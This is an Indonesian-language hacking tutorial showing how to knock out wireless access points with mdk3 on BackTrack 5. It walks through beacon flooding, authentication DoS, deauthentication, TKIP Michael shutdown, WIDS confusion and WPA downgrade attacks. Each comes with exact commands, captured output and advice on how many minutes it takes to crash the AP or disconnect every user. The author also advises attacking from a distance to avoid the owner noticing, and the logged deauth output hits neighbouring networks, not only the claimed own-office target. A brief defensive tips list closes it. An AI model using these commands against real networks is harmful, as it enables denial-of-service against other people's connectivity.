Hai all.... Akhirnya kita ketemu lagi... kali ini saya ingin membahas tentang
segala sesuatu tindakan destruktif terhadap jaringan wireless khususnya
penyerangan terhadap Access Point. Sungguh, tindakan yang saya paparkan ini
sangat destruktif sekali..jadi mohon maaf, jangan gunakan tindakan ini untuk
melakukan penyerangan terhadap jaringan wireless milik pemerintah. lembaga
pendidikan dan tangsi2 sosial lainnya.
-----[ Persiapan
[0] Wireless USB, saya mempergunakan 3 devices wireless USB yang support dengan
packet injection, yaitu :
. Intel Wireless 3945ABG (My internalnotebook Wireless)
Wireless devices ini saya gunakan untuk menjalankan Kismet dan Kismet Console.
. AirLive WL-360USB dengan antena Omni AirLive 10 dbi
Wireless devices ini saya gunakan untuk melakukan penyerangan pada Console 1.
. AirLive WL-1600USB dengan antena Omni AirLive 10 dbi
Wireless devices ini saya gunakan untuk melakukan penyerangan pada Console 2.
* Penyerangan dilakukan melalui 2 console agar AP yang menjadi target
mendapat serangan yang benar2 terserang.
* Saya mempergunakan antena omni 10 dbi agar dapat melakukan tindakan
penyerangan dari kejauhan... kalo dari deket nanti ketauan pemilik AP loh
... becarefull !!!
[1] Dalam penyerangan ini saya mempergunakan Linux BackTrack 5
[2] Tentu ada AP yang menjadi target !!! kali ini yang menjadi target adalah AP
milik kantor tempat saya bekerja yaitu : Linksys WRT54GL yang sudah diupgrade
firmwarenya meempergunakan DDWRT versi 2.4 SP1.
-----[ Tindakan Destruktif
Ada beberapa tindakan destruktif yang bisa dilakukan terhadap AP pada suatu
jaringan wireless, diantaranya :
[1] Beacon Flooding : tindakan penyerangan dengan mengirimkan "Beacon Frames"
dengan membuat banyak Fake AP. Tindakan ini akan mengakibatkan jaringan
wireless menjadi "crash" untuk beberapa waktu.
[2] Authentication DoS Mode : tindakan penyerangan dengan mengirimkan
"Authentication Frame" ke semua AP yang terditeksi dalam jaringan wireless.
Tindakan ini akan mengakibatkan client (user wireless) tidak bisa melakukan
koneksi ke AP, bahkan client (user wireless) yang sudah terkoneksi ke AP akan
ter-reset dan putus koneksi.
[3] Deauthentication / Disassociation Amok Mode : tindakan penyerangan dengan
memutuskan koneksi client (user wireless) ke AP. Tindakan ini akan
mengakibatkan tertendangnya "KickS" semua pemakai AP yang terkoneksi akibatnya
ya putus koneksi.
[4] Michael Shutdown Exploitation (TKIP) : tindakan memutuskan dan membatalkan
semua traffic yang menuju AP. Tindakan ini akan mengakibatkan client (user
wireless) tidak dapat melanjutkan traffic koneksi ke AP.
[5] WIDS/WIPS/WDS Confusion : tindakan pengacauan terhadap IDS dan IPS jaringan
wireless dan pengacauan WDS routing.
[6] MAC filter bruteforce mode : tindakan penyerangan terhadap AP yang memiliki
keamanan "MAC Filtering".
[7] WPA Downgrade test : tindakan penyerangan dengan mempergunakan
"deauthenticates Stations and AP" untuk melakukan pengiriman packet enkripsi
WPA yang mengakibatkan "WPA broken".
Bagaimana teknik penyerangan :
+-----------------------------------------------------------------+
| Memastikan devices wireless yang kita gunakan sudah terpasang : |
+-----------------------------------------------------------------+
root@bt:~# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11bg Mode:Managed Access Point: Not-Associated
Tx-Power=0 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
wlan1 IEEE 802.11abg Mode:Managed Access Point: Not-Associated
Tx-Power=0 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
wlan2 IEEE 802.11bgn Mode:Managed Access Point: Not-Associated
Tx-Power=0 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
root@bt:~#
+----------------------------------------+
| Memastikan ada AP yang akan diserang : |
+----------------------------------------+
root@bt:~# airodump-ng wlan1
Hasil :
+--------------------------------------------------------------------------------------------------------+
|CH 11 ][ Elapsed: 2 mins ][ 2010-12-28 10:32 |
| |
| BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID |
| |
| 00:25:9C:C1:30:0E -37 484 0 0 11 54e. WPA TKIP PSK Hack_Me |
| 00:1E:C1:AB:35:9B -76 257 38 0 11 54 . OPN xxxxxxxxx_FreeHotSpotPremium |
| 00:1C:DF:A3:DC:B5 -78 318 124 0 6 54e WPA TKIP PSK engsun |
| 00:23:69:4F:D2:B2 -82 6 129 0 10 54 WPA TKIP PSK xxxxxxxxx_Hotspot_3 |
| |
| BSSID STATION PWR Rate Lost Packets Probes |
| |
| (not associated) 00:1E:64:32:A8:78 -77 0 - 1 0 5 xxxxxxxxx_FreeHotSpotPremium |
| (not associated) 00:26:69:24:3A:92 -79 0 - 1 0 23 |
| 00:1E:C1:AB:35:9B B4:82:FE:0A:53:51 -59 0 -12 0 109 |
| 00:1E:C1:AB:35:9B 00:26:5E:75:62:F7 -81 0 - 1 0 10 xxxxxxxxx_FreeHotSpotPremium |
| 00:23:69:4F:D2:B2 00:17:C4:78:D1:4B -61 1 - 1 34 157 xxxxxxxxx_Hotspot_3 |
+--------------------------------------------------------------------------------------------------------+
Perhatikan, yang menjadi target dalam kali ini adalah :
+------------------------------------------------------------------------------------+
| 00:25:9C:C1:30:0E -37 484 0 0 11 54e. WPA TKIP PSK Hack_Me |
+------------------------------------------------------------------------------------+
*semua ujicoba ini dilakukan pada AP milik kantor tempat saya bekerja !! dan
sudah mendapat izin dari saya sendiri karena saya administratornya..lol
+---------------------------------+
| Penyerangan : Beacon Flooding |
+---------------------------------+
command : ./mdk3 <wifi_interface> b -n <ssid_target>
. lakukan penyerangan pada 2 console :
console 1 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan1 b -n Hack_Me
console 2 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan2 b -n Hack_Me
Hasil :
Current MAC: C6:69:73:51:FF:4A on Channel 2 with SSID: Hack_Me
Current MAC: 46:7C:C2:54:F8:1B on Channel 14 with SSID: Hack_Me
Current MAC: FC:E4:66:DA:61:0B on Channel 7 with SSID: Hack_Me
Current MAC: B0:1E:6D:4A:4F:D1 on Channel 6 with SSID: Hack_Me
Current MAC: 76:CA:F2:AB:75:25 on Channel 11 with SSID: Hack_Me
-
-
-
Current MAC: 0F:BA:C0:57:2B:A4 on Channel 8 with SSID: Hack_Me
Current MAC: 13:9C:A8:EE:FF:43 on Channel 5 with SSID: Hack_Me
Current MAC: 99:BD:2C:CB:23:07 on Channel 13 with SSID: Hack_Me
Current MAC: F9:31:5B:28:05:0E on Channel 2 with SSID: Hack_Me
Packets sent: 8900 - Speed: 62 packets/sec
Hasil Penyerangan yang dipantau Kismet Console :
+-------------------------------------------------------------------------+
ÃãΩINFO: Detected new managed network "Hack_Me", BSSID 90:A5:F9:FB:33:1E,
ÃãΩ encryption no, channel 1, 11.00 mbit
ÃãΩINFO: Detected new managed network "Hack_Me", BSSID 22:EF:4F:65:73:9F,
ÃãΩ encryption no, channel 14, 11.00 mbit
ÃãΩINFO: Detected new managed network "Hack_Me", BSSID 86:FC:85:DA:6A:6F,
ÃãΩ encryption no, channel 3, 11.00 mbit
ÃãΩINFO: Detected new managed network "Hack_Me", BSSID FC:D0:7B:58:F5:4F,
ÃãΩ encryption no, channel 3, 11.00 mbit
ÃãΩINFO: Detected new managed network "Hack_Me", BSSID F1:DC:CC:81:81:C5,
ÃãΩ encryption no, channel 7, 11.00 mbit
ÃãΩINFO: Detected new managed network "Hack_Me", BSSID B4:E3:4A:D6:D2:99,
ÃãΩ encryption no, channel 13, 11.00 mbit
ÃãΩINFO: Detected new managed network "Hack_Me", BSSID 45:38:0C:CB:35:91,
ÃãΩ encryption no, channel 1, 11.00 mbit
ÃãΩINFO: Detected new managed network "Hack_Me", BSSID 9F:00:2C:9B:D0:A8,
ÃãΩ encryption no, channel 7, 11.00 mbit
ÃãΩINFO: Detected new managed network "Hack_Me", BSSID FC:2F:67:7C:BD:2B,
ÃãΩ encryption no, channel 4, 11.00 mbit
ÃãΩINFO: Detected new managed network "Hack_Me", BSSID 5C:AB:20:6E:80:3C,
ÃãΩ encryption no, channel 11, 11.00 mbit
+-------------------------------------------------------------------------+
* Lakukan teknik penyerangan ini selama kurang lebih (--pake txt susah bikin "
* + - "nih ) 20 menit saja, saya pastikan setelah
20 menit maka jaringan wireless akan "crash". Now.. say " Bye..bye...AP " lol
Makin lama melakukan penyerangan ini, maka makin banyak Fake AP yang tercipta
nah Fake AP inilah yang akan melakukan penyerangan dan menciptakan crash AP
yang menjadi target. Makin banyak Fake AP yang tercipta itu artinya juga makin
banyak client yang bingung melakukan koneksi ke AP karena nama SSID yang
dimiliki si Fake AP pun sama.
+----------------------------------------+
| Penyerangan : Authentication DoS Mode |
+----------------------------------------+
command : ./mdk3 <wifi_interface> a -a <mac_ap_target>
. lakukan penyerangan pada 2 console :
console 1 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan1 a -a 00:25:9C:C1:30:0E
console 2 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan2 a -a 00:25:9C:C1:30:0E
Hasil :
Device is still responding with 101000 clients connected!
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 101500 clients connected!
Connecting Client: CE:2F:06:5A:53:43 to target AP: 00:25:9C:C1:30:0E
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
-
-
-
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 305500 clients connected!
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 306000 clients connected!
Connecting Client: 61:13:0D:78:D8:7A to target AP: 00:25:9C:C1:30:0E
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 306500 clients connected!
Hasil Penyerangan yang dipantau Kismet Console :
+-----------------------------------------------------------------------------+
ÃãΩLOCAL: Flushed protocol data backlog for Kismet client 12
ÃãΩLOCAL: Flushed protocol data backlog for Kismet client 15
ÃãΩLOCAL: Client 12 ring buffer full, storing Kismet protocol data in backlog
ÃãΩ vector
ÃãΩLOCAL: Client 15 ring buffer full, storing Kismet protocol data in backlog
ÃãΩ vector
ÃãΩLOCAL: Flushed protocol data backlog for Kismet client 12
ÃãΩLOCAL: Flushed protocol data backlog for Kismet client 15
ÃãΩLOCAL: Client 12 ring buffer full, storing Kismet protocol data in backlog
ÃãΩ vector
ÃãΩLOCAL: Client 15 ring buffer full, storing Kismet protocol data in backlog
ÃãΩ vector
ÃãΩLOCAL: Flushed protocol data backlog for Kismet client 12
ÃãΩLOCAL: Flushed protocol data backlog for Kismet client 15
ÃãΩLOCAL: Client 12 ring buffer full, storing Kismet protocol data in backlog
ÃãΩ vector
ÃãΩLOCAL: Client 15 ring buffer full, storing Kismet protocol data in backlog
ÃãΩ vector
ÃãΩLOCAL: Flushed protocol data backlog for Kismet client 12
ÃãΩLOCAL: Flushed protocol data backlog for Kismet client 15
ÃãΩ
+------------------------------------------------------------------------------+
* Lakukan teknik penyerangan ini selama kurang lebih 30 menit saja, saya
pastikan bahwa semua clients (user wifi) akan terputus dan tidak ada user
yang bisa melakukan koneksi ke AP. Kismet Console pun tak mampu
melakukan monitoring karena AP yang dimonitor mengalami "Ring Buffer Full. Now,
say "bye..bye...user " lol.
+-----------------------------------------------------------+
| Penyerangan : Deauthentication / Disassociation Amok Mode |
+-----------------------------------------------------------+
command : ./mdk3 <wifi_interface> d -c <channel_target>
. lakukan penyerangan pada 2 console :
console 1 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan1 d -c 11
console 2 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan2 d -c 11
Hasil :
Disconnecting between: 00:17:C4:78:D1:4B and: 00:23:69:4F:D2:B2 on channel: 11
Disconnecting between: FF:FF:FF:FF:FF:FF and: 00:1C:DF:A3:DC:B5 on channel: 11
Disconnecting between: FF:FF:FF:FF:FF:FF and: 00:1C:DF:A3:DC:B5 on channel: 11
Disconnecting between: 00:17:C4:78:D1:4B and: 00:23:69:4F:D2:B2 on channel: 11
Disconnecting between: 00:17:C4:78:D1:4B and: 00:23:69:4F:D2:B2 on channel: 11
Disconnecting between: FF:FF:FF:FF:FF:FF and: 00:1C:DF:A3:DC:B5 on channel: 11
-
-
-
Disconnecting between: 00:17:C4:78:D1:4B and: 00:23:69:4F:D2:B2 on channel: 11
Disconnecting between: 00:17:C4:78:D1:4B and: 00:23:69:4F:D2:B2 on channel: 11
Disconnecting between: FF:FF:FF:FF:FF:FF and: 00:1C:DF:A3:DC:B5 on channel: 11
Disconnecting between: FF:FF:FF:FF:FF:FF and: 00:1C:DF:A3:DC:B5 on channel: 11
Packets sent: 1325 - Speed: 12 packets/sec
Hasil Penyerangan yang dipantau Kismet Console :
+-------------------------------------------------------------------------------+
ÃãΩALERT: BCASTDISCON Network BSSID 00:1C:DF:A3:DC:B5 broadcast deauthenticate
ÃãΩ /disassociation of all clients, possible DoS
ÃãΩALERT: BCASTDISCON Network BSSID 00:1C:DF:A3:DC:B5 broadcast deauthenticate
ÃãΩ /disassociation of all clients, possible DoS
ÃãΩALERT: BCASTDISCON Network BSSID 00:1C:DF:A3:DC:B5 broadcast deauthenticate
ÃãΩ /disassociation of all clients, possible DoS
ÃãΩALERT: BCASTDISCON Network BSSID 00:1C:DF:A3:DC:B5 broadcast deauthenticate
ÃãΩ /disassociation of all clients, possible DoS
ÃãΩALERT: BCASTDISCON Network BSSID 00:1C:DF:A3:DC:B5 broadcast deauthenticate
ÃãΩ /disassociation of all clients, possible DoS
ÃãΩALERT: BCASTDISCON Network BSSID 00:1C:DF:A3:DC:B5 broadcast deauthenticate
ÃãΩ /disassociation of all clients, possible DoS
ÃãΩALERT: BCASTDISCON Network BSSID 00:1C:DF:A3:DC:B5 broadcast deauthenticate
ÃãΩ /disassociation of all clients, possible DoS
ÃãΩALERT: BCASTDISCON Network BSSID 00:1C:DF:A3:DC:B5 broadcast deauthenticate
ÃãΩ /disassociation of all clients, possible DoS
ÃãΩALERT: BCASTDISCON Network BSSID 00:1C:DF:A3:DC:B5 broadcast deauthenticate
ÃãΩ /disassociation of all clients, possible DoS
ÃãΩALERT: BCASTDISCON Network BSSID 00:1C:DF:A3:DC:B5 broadcast deauthenticate
ÃãΩ /disassociation of all clients, possible DoS
ÃãΩ
+--------------------------------------------------------------------------------+
* Lakukan teknik penyerangan ini selama kurang lebih 20 menit saja, saya
pastikan bahwa semua clients pada channel yand ditargetkan akan terputus.
Ingat..jika ada beberapa AP yang mepergunakan channel yang sama maka semua yg
berada pada channel tersebut yang menjadi target. Now, say " just having
fun....lol "
+----------------------------------------------------+
| Penyerangan : Michael shutdown exploitation (TKIP) |
+----------------------------------------------------+
command : ./mdk3 <wifi_interface> m -t <mac_ap_target>
. lakukan penyerangan pada 2 console :
console 1 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan1 m -t 00:25:9C:C1:30:0E
console 2 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan2 m -t 00:25:9C:C1:30:0E
Hasil :
Connecting Client: A7:13:C2:56:81:11 to target AP: 00:25:9C:C1:30:0E
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 225000 clients connected!
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 225500 clients connected!
Connecting Client: 5A:AC:9A:B7:02:41 to target AP: 00:25:9C:C1:30:0E
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 226000 clients connected!
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 226500 clients connected!
-
-
-
Connecting Client: 7C:49:90:FC:94:F4 to target AP: 00:25:9C:C1:30:0E
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 319000 clients connected!
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 319500 clients connected!
Connecting Client: 2C:7F:31:E3:8F:BC to target AP: 00:25:9C:C1:30:0E
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 320000 clients connected!
Hasil Penyerangan yang dipantau Kismet Console :
+-----------------------------------------------------------------------------+
ÃãΩINFO: Detected new probe network "<Any>", BSSID 00:26:CC:43:E5:0B,
ÃãΩ encryption no, channel 0, 54.00 mbit
ÃãΩINFO: Kismet server accepted connection from 127.0.0.1
ÃãΩINFO: Detected new probe network "<Any>", BSSID 00:17:C4:78:D1:4B,
ÃãΩ encryption no, channel 0, 54.00 mbit
ÃãΩINFO: Detected new probe network "<Any>", BSSID 00:26:69:24:3A:92,
ÃãΩ encryption no, channel 0, 54.00 mbit
ÃãΩINFO: Detected new probe network "BinaInsani_FreeHotSpotPremium", BSSID 00:
ÃãΩ 26:5E:75:62:F7, encryption no, channel 0, 54.00 mbit
ÃãΩINFO: Saved data files
ÃãΩINFO: Detected new probe network "<Any>", BSSID E4:EC:10:7F:34:F9,
ÃãΩ encryption no, channel 0, 54.00 mbit
ÃãΩINFO: Detected new probe network "<Any>", BSSID 00:1E:64:32:A8:78,
ÃãΩ encryption no, channel 0, 54.00 mbit
ÃãΩINFO: Found IP range 192.168.5.22/255.255.255.254 for network
ÃãΩ 00:1E:C1:AB:35:9B
ÃãΩINFO: Detected new probe network "b71baru", BSSID 30:69:4B:DF:1E:D2,
ÃãΩ encryption no, channel 0, 54.00 mbit
ÃãΩINFO: Detected new probe network "<Any>", BSSID 00:26:82:00:95:27,
ÃãΩ encryption no, channel 0, 54.00 mbit
+------------------------------------------------------------------------------+
* Lakukan teknik penyerangan ini selama kurang lebih 30 menit saja, traffic
koneksi terhenti...koneksi terhenti...koneksi putus...putus....
Kismet Monitor pun hanya terdiam dan tidak mampu melakukan monitoring... Now,
say "bye...bye...AP lol"
+----------------------------------------------------+
| Penyerangan : WIDS/WIPS/WDS Confusion |
+----------------------------------------------------+
command : ./mdk3 <wifi_interface> w -e <ssid_target> -c <channel_AP> -z
. lakukan penyerangan pada 2 console :
console 1 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan1 w -e Hack_Me -c 11 -z
console 2 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan2 w -e Hack_Me -c 11 -z
Hasil :
Waiting 10 seconds for initialization...
Found AP: 00:25:9C:C1:30:0E on channel 11
Found Client: FF:FF:FF:FF:FF:FF on AP 00:25:9C:C1:30:0E
Found Client: 01:00:5E:00:00:FB on AP 00:25:9C:C1:30:0E
* Lakukan teknik penyerangan ini selama kurang lebih 30 menit saja, maka
wireless yang diset sebagai WDS akan mangalamai "Chaos".
+----------------------------------------------+
| Penyerangan : WPA Downgrade Test |
+----------------------------------------------+
* pengertian WPA downgrade disini bukan berarti menurunkan ekripsi WPA ke WEP
loh...;)
command : ./mdk3 <wifi_interface> g -t <mac_address_ap_target>
. lakukan penyerangan pada 2 console :
console 1 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan1 g -t 00:25:9C:C1:30:0E
console 2 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan2 g -t 00:25:9C:C1:30:0E
Hasil :
s: 67 Beacons/sec: 6
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 3
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 3
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 5
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 3
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 4
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 5
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 4
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 6
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 1
-
-
-
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 4
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 4
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 5
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 0
NOTICE: Did not receive any beacons! Maybe AP has been reconfigured and/or is rebooting!
Packets sent: 432 - Speed: 0 packets/sec
Hasil Penyerangan yang dipantau Kismet Console :
+-------------------------------------------------------------------------------+
楳èè èè èè è
ÃãΩINFO: Detected new probe network "<Any>", BSSID 00:1E:64:32:A8:78,
ÃãΩ encryption no, channel 0, 54.00 mbit
ÃãΩINFO: Found IP range 192.168.5.22/255.255.255.254 for network
ÃãΩ 00:1E:C1:AB:35:9B
ÃãΩINFO: Detected new probe network "b71baru", BSSID 30:69:4B:DF:1E:D2,
ÃãΩ encryption no, channel 0, 54.00 mbit
ÃãΩINFO: Detected new probe network "<Any>", BSSID 00:26:82:00:95:27,
ÃãΩ encryption no, channel 0, 54.00 mbit
ÃãΩINFO: Saved data files
ÃãΩINFO: Saved data files
ÃãΩALERT: BCASTDISCON Network BSSID 00:25:9C:C1:30:0E broadcast deauthenticate
ÃãΩ /disassociation of all clients, possible DoS
ÃãΩINFO: Saved data files
ÃãΩALERT: BCASTDISCON Network BSSID 00:25:9C:C1:30:0E broadcast deauthenticate
ÃãΩ /disassociation of all clients, possible DoS
ÃãΩALERT: BCASTDISCON Network BSSID 00:25:9C:C1:30:0E broadcast deauthenticate
ÃãΩ /disassociation of all clients, possible DoS
ÃãΩALERT: BCASTDISCON Network BSSID 00:25:9C:C1:30:0E broadcast deauthenticate
ÃãΩ /disassociation of all clients, possible DoS
ÃãΩINFO: Saved data files
ÃãΩ
+--------------------------------------------------------------------------------+
* Lakukan teknik penyerangan ini selama kurang lebih 30 menit saja, Posible DoS !!!!!!!
-----[ Penanganan :
. Gunakan Wireless IDS, Wireless IPS
. Manfaatkan aplikasi AP monitoring utk pemantauan AP
. Dirikan beberapa Fake AP untuk mengacaukan target sebenarnya
. Hidden Your SSID, sekalipun Kismet bisa menembusnya....lol
Akhirnya selesai juga menulis tindak kejahatan pada wireless kali ini... semoga
tidak menjadi bahan kotor buat otak Anda... buang saja tulisan ini jika merasa
tidak bermanfaat dalam kehidupan Anda. Sungguh... sejahat2nya ilmu tetaplah
ilmu..... semoga bisa menjadi kebaikan....
wassalam,
thx bwt om lirva32.